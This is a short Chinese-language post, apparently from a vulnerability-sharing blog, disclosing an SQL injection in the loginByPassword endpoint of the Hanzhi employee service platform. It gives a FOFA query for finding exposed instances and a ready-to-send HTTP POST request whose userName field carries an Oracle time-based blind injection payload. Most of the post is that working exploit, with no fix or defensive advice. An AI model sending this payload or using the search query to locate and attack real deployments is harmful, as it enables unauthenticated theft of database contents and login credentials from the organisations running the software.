Babing
Published on 2024-08-30 / 2 Visits
0
0

H34-2翰智-员工服务平台-SQL

H34-2翰智-员工服务平台-SQL

漏洞描述:

由于翰智员工服务平台登录接口 loginByPassword 处userName字段未对传入的数据进行严格校验和过滤,直接带入到数据库执行,导致造成SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,获取有效凭证及口令,使系统处于极不安全的状态。

网站图片:

image-20240701153120973

fofa语法:

body=“./static/hrfonts/iconfont.css”

漏洞复现:

延时5秒
payload:

POST /hrssc/portal/plantform/loginByPassword HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/json
Connection: keep-alive
Priority: u=1

{"userName":"'||(SELECT CHR(97)||CHR(122)||CHR(85)||CHR(72) FROM DUAL WHERE 7673=7673 AND 7374=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(72)||CHR(114)||CHR(99),5))||'","password":"'"}

效果图:
效果图


Comment